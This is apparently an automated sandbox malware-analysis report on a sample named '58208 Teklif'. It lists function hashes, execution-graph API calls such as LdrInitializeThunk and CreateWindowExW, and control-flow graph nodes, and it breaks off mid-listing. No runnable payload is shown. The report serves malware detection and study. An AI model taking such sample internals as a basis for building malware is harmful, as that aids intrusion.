                                                      • Source File: 00000000.00000002.1318416703.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_14fd000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                      • Instruction ID: ab96e1267f240d84f4c0c72b30c591321d9adf1f4c294e2bce679ab41e09baf1
                                                      • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                      • Instruction Fuzzy Hash: 4C11CD72804240CFDB02CF44D9C4B56BF61FB84224F24C2AAD9090A766C33AE45ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014FD4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318416703.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_14fd000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                      • Instruction ID: ed3e7585d95a67295d16a9e66b994ea7091a81f2b86598417acb906d17363a98
                                                      • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                      • Instruction Fuzzy Hash: 2011CD72804280CFCB02CF54D9C4B16BF61FB84214F24C6AAD9090B366C336D45ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0150D1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318487544.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_150d000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                      • Instruction ID: 53233ebd80ee79e34c6ff57f90ed0c80d38ba8c848a71a5b234b167134b7713d
                                                      • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                      • Instruction Fuzzy Hash: 2211BB75504280DFDB02CF98C5C4B19BBB1FB84224F24C6A9D8494F696C33AD40ACB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 07795590 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MSM!
                                                      • API String ID: 0-796847619
                                                      • Opcode ID: c3370d198c972a68f55f5c5941a4800c5188510de977e1ef670e2ebbd075d62e
                                                      • Instruction ID: 9513ffa68b2075e3e7ce9a405d3a9593e49f3fe0f19705923b684710c76d193c
                                                      • Opcode Fuzzy Hash: c3370d198c972a68f55f5c5941a4800c5188510de977e1ef670e2ebbd075d62e
                                                      • Instruction Fuzzy Hash: FBE119B4E012198FCB14CFA9D5909AEFBB2FF89304F248169D815AB395D734AD41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07795588 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MSM!
                                                      • API String ID: 0-796847619
                                                      • Opcode ID: 28a289b57e05e2c9cc573b4adc401acd9f5cc303915bfb684742a2e06b0c53f0
                                                      • Instruction ID: af3895aeac6557f91371ee5181466aef3e044926a3caff85949e620de833fb2f
                                                      • Opcode Fuzzy Hash: 28a289b57e05e2c9cc573b4adc401acd9f5cc303915bfb684742a2e06b0c53f0
                                                      • Instruction Fuzzy Hash: 205119B4E112198FCB14CFA9D5905AEBBF2FF89304F24C169D418AB356D7309A42CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07799E58 Relevance: .4, Instructions: 371COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 75b2a41ec2abb536db39d928d1699425edcf289171e7270b2d253e7180165a04
                                                      • Instruction ID: 2351dd6659a90e227f7308aebedb3bfc94d934d6608725aa9d30a70c1c1e63e5
                                                      • Opcode Fuzzy Hash: 75b2a41ec2abb536db39d928d1699425edcf289171e7270b2d253e7180165a04
                                                      • Instruction Fuzzy Hash: D4D1CEB07026028FDB29DB79D460B6AB7F6AFC9740F14897ED545CB2A0DB35E801CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07792C48 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf621c91b4794d8bfcf7472625045a514303a32f919e1bda14264e6b7e402c2d
                                                      • Instruction ID: 35adb1b85d80b480677643e766c69d595da9a072fb6cfb81c379bb3fe4ee6118
                                                      • Opcode Fuzzy Hash: bf621c91b4794d8bfcf7472625045a514303a32f919e1bda14264e6b7e402c2d
                                                      • Instruction Fuzzy Hash: ADE14CB4E011199FCB14DFA9D5909AEFBB2FF88304F248169D815AB356D730AD81CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077934B8 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be4e8a46fdae131227c0b069597c4ff19b9b236e44eecc2762cf08883909b627
                                                      • Instruction ID: ddf82347d1716aa7db501f1ce521a25fe3415c365f458b20b778c7420c40357c
                                                      • Opcode Fuzzy Hash: be4e8a46fdae131227c0b069597c4ff19b9b236e44eecc2762cf08883909b627
                                                      • Instruction Fuzzy Hash: 68E107B4E011598FCB14CFA9D5909AEFBB2FF89304F248169E815AB356D734AD41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07794CB8 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 60665ec9c12befbdfbded8cbf399259b568d21edac8a33c7117e69f7fd9a1326
                                                      • Instruction ID: 69ca3a4ba88582d784cdb519a97c8d03d6886340f39952fc878fe2ddfac93c98
                                                      • Opcode Fuzzy Hash: 60665ec9c12befbdfbded8cbf399259b568d21edac8a33c7117e69f7fd9a1326
                                                      • Instruction Fuzzy Hash: 08E13BB4E011598FCB14CFA9C5909AEFBB2FF89304F248169D815AB356D734AD42CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07793080 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66363be7b5e102e6bd273c2cce798a50620a537510ad80e7fca0ef5703411ff9
                                                      • Instruction ID: c91d66183ca47011c070d487dbac65f0327217193b45e176ea11359ce930a164
                                                      • Opcode Fuzzy Hash: 66363be7b5e102e6bd273c2cce798a50620a537510ad80e7fca0ef5703411ff9
                                                      • Instruction Fuzzy Hash: B6E119B4E012598FCB14CFA9D5909AEFBB2FF89304F248169D815AB356C734AD41CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0155DE0C Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e266ca72f48bb39b79d660ea9a26fb7b7624a257a8ad5531d97c813bb17c6b9
                                                      • Instruction ID: 0f993b28d2d8e8de1a98f6369263f2cd9bb54e39dcdb5f9af46b80c5356c4ae2
                                                      • Opcode Fuzzy Hash: 4e266ca72f48bb39b79d660ea9a26fb7b7624a257a8ad5531d97c813bb17c6b9
                                                      • Instruction Fuzzy Hash: 5EA16D32A0020A8FCF55DFB4C89459EBBB2FF98300B15856BE905AF265DB31E945DB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07792C38 Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b03f275360b1094d2c38cacbbe709619b1278deaa958c43250452f3070c19a40
                                                      • Instruction ID: d9e08a988b52886d9347635772aab31b74d5290ad0e5aea7534aa3529835a55d
                                                      • Opcode Fuzzy Hash: b03f275360b1094d2c38cacbbe709619b1278deaa958c43250452f3070c19a40
                                                      • Instruction Fuzzy Hash: 8D5159B5E012199FCB14DFA9D9905AEFBB2FF89304F24C169D418AB356C7349942CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 077934A8 Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4f3a898b01c19516e0c6a1763e0a0c4fb0fb20bf506087c43493f3bb8464670
                                                      • Instruction ID: 4b5b1c01f6fa7b5cbab34993b6ca09c6ccf45f187a52163d95d451a32a1e4a85
                                                      • Opcode Fuzzy Hash: f4f3a898b01c19516e0c6a1763e0a0c4fb0fb20bf506087c43493f3bb8464670
                                                      • Instruction Fuzzy Hash: 765109B4E012198FDB14CFA9D5905AEBBF2FF89304F24816AD418AB356D7349942CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:10.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:3.5%
                                                      Total number of Nodes:170
                                                      Total number of Limit Nodes:12
                                                      execution_graph 36298 141d3d0 36299 141d3dc 36298->36299 36306 6bd8a5d 36299->36306 36312 6bd8a58 36299->36312 36300 141d5b6 36301 141d611 36300->36301 36318 6bf3a53 36300->36318 36322 6bf3a60 36300->36322 36307 6bd8a7a 36306->36307 36308 6bd8b8c 36307->36308 36326 5a98790 36307->36326 36330 5a98d94 36307->36330 36336 5a989b0 36307->36336 36308->36300 36313 6bd8a7a 36312->36313 36314 6bd8b8c 36313->36314 36315 5a98790 LdrInitializeThunk 36313->36315 36316 5a989b0 2 API calls 36313->36316 36317 5a98d94 2 API calls 36313->36317 36314->36300 36315->36314 36316->36314 36317->36314 36319 6bf3a6f 36318->36319 36342 6bf312c 36319->36342 36323 6bf3a6f 36322->36323 36324 6bf312c 4 API calls 36323->36324 36325 6bf3a90 36324->36325 36325->36301 36327 5a987a2 36326->36327 36328 5a987a7 36326->36328 36327->36308 36328->36327 36329 5a98ed1 LdrInitializeThunk 36328->36329 36329->36327 36334 5a98c4b 36330->36334 36331 5a98d8c LdrInitializeThunk 36333 5a98ee9 36331->36333 36333->36308 36334->36331 36335 5a98790 LdrInitializeThunk 36334->36335 36335->36334 36338 5a989e1 36336->36338 36337 5a98b41 36337->36308 36338->36337 36339 5a98d8c LdrInitializeThunk 36338->36339 36341 5a98790 LdrInitializeThunk 36338->36341 36339->36337 36341->36338 36343 6bf3137 36342->36343 36346 6bf4904 36343->36346 36345 6bf5416 36345->36345 36347 6bf490f 36346->36347 36348 6bf5b3c 36347->36348 36350 6bf77c8 36347->36350 36348->36345 36351 6bf77e9 36350->36351 36352 6bf780d 36351->36352 36355 6bf7969 36351->36355 36359 6bf7978 36351->36359 36352->36348 36356 6bf7978 36355->36356 36357 6bf79be 36356->36357 36363 6bf5f7c 36356->36363 36357->36352 36360 6bf7985 36359->36360 36361 6bf79be 36360->36361 36362 6bf5f7c 4 API calls 36360->36362 36361->36352 36362->36361 36364 6bf5f87 36363->36364 36366 6bf7a30 36364->36366 36367 6bf5fb0 36364->36367 36366->36366 36368 6bf5fbb 36367->36368 36374 6bf5fc0 36368->36374 36370 6bf7a9f 36378 6bfcea0 36370->36378 36387 6bfce9b 36370->36387 36371 6bf7ad9 36371->36366 36377 6bf5fcb 36374->36377 36375 6bf8dc0 36375->36370 36376 6bf77c8 4 API calls 36376->36375 36377->36375 36377->36376 36380 6bfced1 36378->36380 36382 6bfcfd1 36378->36382 36379 6bfcedd 36379->36371 36380->36379 36396 6bfd118 36380->36396 36400 6bfd113 36380->36400 36381 6bfcf1d 36404 6bfe81b 36381->36404 36414 6bfe820 36381->36414 36382->36371 36388 6bfced1 36387->36388 36390 6bfcfd1 36387->36390 36389 6bfcedd 36388->36389 36394 6bfd118 2 API calls 36388->36394 36395 6bfd113 2 API calls 36388->36395 36389->36371 36390->36371 36391 6bfcf1d 36392 6bfe81b 3 API calls 36391->36392 36393 6bfe820 3 API calls 36391->36393 36392->36390 36393->36390 36394->36391 36395->36391 36424 6bfd168 36396->36424 36431 6bfd163 36396->36431 36397 6bfd122 36397->36381 36401 6bfd122 36400->36401 36402 6bfd168 2 API calls 36400->36402 36403 6bfd163 2 API calls 36400->36403 36401->36381 36402->36401 36403->36401 36405 6bfe84b 36404->36405 36438 6bfed7b 36405->36438 36443 6bfed80 36405->36443 36406 6bfe8ce 36407 6bfe8fa 36406->36407 36408 6bfc100 GetModuleHandleW 36406->36408 36407->36407 36409 6bfe93e 36408->36409 36410 6bff6f3 CreateWindowExW CreateWindowExW 36409->36410 36411 6bff700 CreateWindowExW 36409->36411 36410->36407 36411->36407 36415 6bfe84b 36414->36415 36420 6bfed7b GetModuleHandleW 36415->36420 36421 6bfed80 GetModuleHandleW 36415->36421 36416 6bfe8ce 36419 6bfe8fa 36416->36419 36448 6bfc100 36416->36448 36420->36416 36421->36416 36425 6bfd179 36424->36425 36428 6bfd194 36424->36428 36426 6bfc100 GetModuleHandleW 36425->36426 36427 6bfd184 36426->36427 36427->36428 36429 6bfd3fb GetModuleHandleW LoadLibraryExW 36427->36429 36430 6bfd400 GetModuleHandleW LoadLibraryExW 36427->36430 36428->36397 36429->36428 36430->36428 36432 6bfd179 36431->36432 36435 6bfd194 36431->36435 36433 6bfc100 GetModuleHandleW 36432->36433 36434 6bfd184 36433->36434 36434->36435 36436 6bfd3fb GetModuleHandleW LoadLibraryExW 36434->36436 36437 6bfd400 GetModuleHandleW LoadLibraryExW 36434->36437 36435->36397 36436->36435 36437->36435 36439 6bfed80 36438->36439 36440 6bfee2e 36439->36440 36441 6bfeee3 GetModuleHandleW 36439->36441 36442 6bfeef0 GetModuleHandleW 36439->36442 36441->36440 36442->36440 36444 6bfedad 36443->36444 36445 6bfee2e 36444->36445 36446 6bfeee3 GetModuleHandleW 36444->36446 36447 6bfeef0 GetModuleHandleW 36444->36447 36446->36445 36447->36445 36449 6bfd358 GetModuleHandleW 36448->36449 36451 6bfd3cd 36449->36451 36452 6bff700 36451->36452 36455 6bff6f3 36451->36455 36453 6bff735 36452->36453 36454 6bfd84c CreateWindowExW 36452->36454 36453->36419 36454->36453 36457 6bff6be 36455->36457 36458 6bff6fb 36455->36458 36456 6bff676 36456->36419 36457->36456 36462 6bff813 CreateWindowExW 36457->36462 36458->36457 36459 6bff712 36458->36459 36460 6bfd84c CreateWindowExW 36459->36460 36461 6bff735 36460->36461 36461->36419 36463 6bff874 36462->36463 36279 5a9bd0b 36281 5a9bbcf 36279->36281 36280 5a9bcb3 36281->36280 36285 5a9be28 36281->36285 36289 5a9bf64 36281->36289 36293 5a9bfc4 36281->36293 36286 5a9be50 LdrInitializeThunk 36285->36286 36288 5a9be86 36286->36288 36288->36280 36290 5a9bf43 36289->36290 36291 5a9be79 LdrInitializeThunk 36290->36291 36292 5a9be86 36290->36292 36291->36292 36292->36280 36294 5a9bf43 36293->36294 36295 5a9bfc9 36293->36295 36296 5a9be79 LdrInitializeThunk 36294->36296 36297 5a9be86 36294->36297 36295->36280 36296->36297 36297->36280 36464 5a990dd 36465 5a99105 36464->36465 36466 5a98790 LdrInitializeThunk 36465->36466 36467 5a9afe7 36465->36467 36469 5a9940e 36465->36469 36466->36469 36468 5a98790 LdrInitializeThunk 36468->36469 36469->36467 36469->36468 36470 6bf4b68 36471 6bf4bae GetCurrentProcess 36470->36471 36473 6bf4bf9 36471->36473 36474 6bf4c00 GetCurrentThread 36471->36474 36473->36474 36475 6bf4c3d GetCurrentProcess 36474->36475 36476 6bf4c36 36474->36476 36477 6bf4c73 36475->36477 36476->36475 36482 6bf4d48 36477->36482 36485 6bf4d43 36477->36485 36478 6bf4c9b GetCurrentThreadId 36479 6bf4ccc 36478->36479 36488 6bf4834 36482->36488 36486 6bf4d76 36485->36486 36487 6bf4834 DuplicateHandle 36485->36487 36486->36478 36487->36486 36489 6bf4db0 DuplicateHandle 36488->36489 36490 6bf4d76 36489->36490 36490->36478

                                                      Executed Functions

                                                      Function 014168E0 Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 720 14168e0-1416903 721 1416905-141690b 720->721 722 141690e-141692e 720->722 721->722 725 1416930 722->725 726 1416935-141693c 722->726 727 1416cc4-1416ccd 725->727 728 141693e-1416949 726->728 729 1416cd5-1416ce1 728->729 730 141694f-1416962 728->730 733 1416964-1416972 730->733 734 1416978-1416993 730->734 733->734 737 1416c4c-1416c53 733->737 738 1416995-141699b 734->738 739 14169b7-14169ba 734->739 737->727 744 1416c55-1416c57 737->744 742 14169a4-14169a7 738->742 743 141699d 738->743 740 14169c0-14169c3 739->740 741 1416b14-1416b1a 739->741 740->741 751 14169c9-14169cf 740->751 749 1416b20-1416b25 741->749 750 1416c06-1416c09 741->750 745 14169a9-14169ac 742->745 746 14169da-14169e0 742->746 743->741 743->742 743->746 743->750 747 1416c66-1416c6c 744->747 748 1416c59-1416c5e 744->748 752 14169b2 745->752 753 1416a46-1416a4c 745->753 756 14169e2-14169e4 746->756 757 14169e6-14169e8 746->757 747->729 754 1416c6e-1416c73 747->754 748->747 749->750 758 1416cd0 750->758 759 1416c0f-1416c15 750->759 751->741 755 14169d5 751->755 752->750 753->750 762 1416a52-1416a58 753->762 760 1416c75-1416c7a 754->760 761 1416cb8-1416cbb 754->761 755->750 763 14169f2-14169fb 756->763 757->763 758->729 764 1416c17-1416c1f 759->764 765 1416c3a-1416c3e 759->765 760->758 767 1416c7c 760->767 761->758 766 1416cbd-1416cc2 761->766 768 1416a5a-1416a5c 762->768 769 1416a5e-1416a60 762->769 771 14169fd-1416a08 763->771 772 1416a0e-1416a36 763->772 764->729 770 1416c25-1416c34 764->770 765->737 773 1416c40-1416c46 765->773 766->727 766->744 774 1416c83-1416c88 767->774 775 1416a6a-1416a81 768->775 769->775 770->734 770->765 771->750 771->772 793 1416b2a-1416b60 772->793 794 1416a3c-1416a41 772->794 773->728 773->737 777 1416caa-1416cac 774->777 778 1416c8a-1416c8c 774->778 787 1416a83-1416a9c 775->787 788 1416aac-1416ad3 775->788 777->758 784 1416cae-1416cb1 777->784 781 1416c9b-1416ca1 778->781 782 1416c8e-1416c93 778->782 781->729 786 1416ca3-1416ca8 781->786 782->781 784->761 786->777 789 1416c7e-1416c81 786->789 787->793 797 1416aa2-1416aa7 787->797 788->758 799 1416ad9-1416adc 788->799 789->758 789->774 800 1416b62-1416b66 793->800 801 1416b6d-1416b75 793->801 794->793 797->793 799->758 802 1416ae2-1416b0b 799->802 803 1416b85-1416b89 800->803 804 1416b68-1416b6b 800->804 801->758 805 1416b7b-1416b80 801->805 802->793 817 1416b0d-1416b12 802->817 806 1416ba8-1416bac 803->806 807 1416b8b-1416b91 803->807 804->801 804->803 805->750 809 1416bb6-1416bd5 call 1416eb8 806->809 810 1416bae-1416bb4 806->810 807->806 811 1416b93-1416b9b 807->811 812 1416bdb-1416bdf 809->812 810->809 810->812 811->758 813 1416ba1-1416ba6 811->813 812->750 815 1416be1-1416bfd 812->815 813->750 815->750 817->793
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q$(o_q$,cq$,cq
                                                      • API String ID: 0-196421762
                                                      • Opcode ID: 59950719d9273bd0a9a221942b5eb15929d57fca7155a82c784d950f85ea3a8a
                                                      • Instruction ID: 861731714c6ce9ca78b5820df0bc2674a1c618400349f4e8196fb492ea7b1ffb
                                                      • Opcode Fuzzy Hash: 59950719d9273bd0a9a221942b5eb15929d57fca7155a82c784d950f85ea3a8a
                                                      • Instruction Fuzzy Hash: E7D11B70E001199FDB14CF99C984AAEBBB6FF88344F56846AE505AB379E770E841CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141617D Relevance: 3.0, Strings: 2, Instructions: 504COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2016 141617d-14161ae 2017 14161b4-14161c2 2016->2017 2018 1416779-14167d4 call 14168e0 2016->2018 2022 14161f0-1416201 2017->2022 2023 14161c4-14161d5 2017->2023 2036 1416824-1416828 2018->2036 2037 14167d6-14167da 2018->2037 2024 1416203-1416207 2022->2024 2025 1416272-1416286 2022->2025 2023->2022 2030 14161d7-14161e3 2023->2030 2026 1416222-141622b 2024->2026 2027 1416209-1416215 2024->2027 2162 1416289 call 1416790 2025->2162 2163 1416289 call 141617d 2025->2163 2034 1416231-1416234 2026->2034 2035 1416534 2026->2035 2032 14165a3-14165ee 2027->2032 2033 141621b-141621d 2027->2033 2038 1416539-141659c 2030->2038 2039 14161e9-14161eb 2030->2039 2031 141628f-1416295 2040 1416297-1416299 2031->2040 2041 141629e-14162a5 2031->2041 2114 14165f5-1416674 2032->2114 2042 141652a-1416531 2033->2042 2034->2035 2043 141623a-1416259 2034->2043 2035->2038 2046 141682a-1416839 2036->2046 2047 141683f-1416853 2036->2047 2044 14167e9-14167f0 2037->2044 2045 14167dc-14167e1 2037->2045 2038->2032 2039->2042 2040->2042 2051 1416393-14163a4 2041->2051 2052 14162ab-14162c2 2041->2052 2043->2035 2080 141625f-1416265 2043->2080 2054 14168c6-14168da 2044->2054 2055 14167f6-14167fd 2044->2055 2045->2044 2048 1416865-141686f 2046->2048 2049 141683b-141683d 2046->2049 2050 141685b-1416862 2047->2050 2159 1416855 call 14198b1 2047->2159 2160 1416855 call 14198b8 2047->2160 2056 1416871-1416877 2048->2056 2057 1416879-141687d 2048->2057 2049->2050 2073 14163a6-14163b3 2051->2073 2074 14163ce-14163d4 2051->2074 2052->2051 2070 14162c8-14162d4 2052->2070 2055->2036 2060 14167ff-1416803 2055->2060 2061 1416885-14168bf 2056->2061 2057->2061 2064 141687f 2057->2064 2067 1416812-1416819 2060->2067 2068 1416805-141680a 2060->2068 2061->2054 2064->2061 2067->2054 2069 141681f-1416822 2067->2069 2068->2067 2069->2050 2077 14162da-1416346 2070->2077 2078 141638c-141638e 2070->2078 2076 14163ef-14163f5 2073->2076 2089 14163b5-14163c1 2073->2089 2075 14163d6-14163e2 2074->2075 2074->2076 2082 14163e8-14163ea 2075->2082 2083 141668b-14166ee 2075->2083 2084 1416527 2076->2084 2085 14163fb-1416418 2076->2085 2115 1416374-1416389 2077->2115 2116 1416348-1416372 2077->2116 2078->2042 2080->2018 2087 141626b-141626f 2080->2087 2082->2042 2140 14166f5-1416774 2083->2140 2084->2042 2085->2035 2107 141641e-1416421 2085->2107 2087->2025 2093 14163c7-14163c9 2089->2093 2094 1416679-1416684 2089->2094 2093->2042 2094->2083 2107->2018 2111 1416427-141644d 2107->2111 2111->2084 2122 1416453-141645f 2111->2122 2115->2078 2116->2115 2123 1416523-1416525 2122->2123 2124 1416465-14164dd 2122->2124 2123->2042 2142 141650b-1416520 2124->2142 2143 14164df-1416509 2124->2143 2142->2123 2143->2142 2159->2050 2160->2050 2162->2031 2163->2031
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o_q$Hcq
                                                      • API String ID: 0-689770731
                                                      • Opcode ID: a524a5a3654dcec8b2cd9920fca0d32f20622b84bccf1acd97f2926677facc88
                                                      • Instruction ID: aba26fee9618a56932846acdb3f9f21ac8358b87d4dd094982c5719082228ce8
                                                      • Opcode Fuzzy Hash: a524a5a3654dcec8b2cd9920fca0d32f20622b84bccf1acd97f2926677facc88
                                                      • Instruction Fuzzy Hash: D0129F70A002199FDB14DF69D854BAEBBF6BF88300F15856DE4059B3A9EB74EC41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141B388 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2164 141b388-141b39b 2165 141b3a1-141b3aa 2164->2165 2166 141b4da-141b4e1 2164->2166 2167 141b3b0-141b3b4 2165->2167 2168 141b4e4 2165->2168 2169 141b3b6 2167->2169 2170 141b3ce-141b3d5 2167->2170 2172 141b4e9-141b4f1 2168->2172 2173 141b3b9-141b3c4 2169->2173 2170->2166 2171 141b3db-141b3e8 2170->2171 2171->2166 2177 141b3ee-141b401 2171->2177 2178 141b4f3-141b510 2172->2178 2179 141b525-141b52a 2172->2179 2173->2168 2174 141b3ca-141b3cc 2173->2174 2174->2170 2174->2173 2180 141b403 2177->2180 2181 141b406-141b40e 2177->2181 2182 141b512-141b522 2178->2182 2183 141b53c 2178->2183 2188 141b533-141b536 2179->2188 2189 141b52c-141b531 2179->2189 2180->2181 2185 141b410-141b416 2181->2185 2186 141b47b-141b47d 2181->2186 2182->2179 2184 141b53e-141b542 2183->2184 2185->2186 2191 141b418-141b41e 2185->2191 2186->2166 2190 141b47f-141b485 2186->2190 2193 141b543-141b580 2188->2193 2194 141b538-141b53a 2188->2194 2189->2184 2190->2166 2195 141b487-141b491 2190->2195 2191->2172 2196 141b424-141b43c 2191->2196 2200 141b582 2193->2200 2201 141b587-141b664 call 1413960 call 1413480 2193->2201 2194->2182 2194->2183 2195->2172 2197 141b493-141b4ab 2195->2197 2206 141b469-141b46c 2196->2206 2207 141b43e-141b444 2196->2207 2209 141b4d0-141b4d3 2197->2209 2210 141b4ad-141b4b3 2197->2210 2200->2201 2227 141b666 2201->2227 2228 141b66b-141b68c call 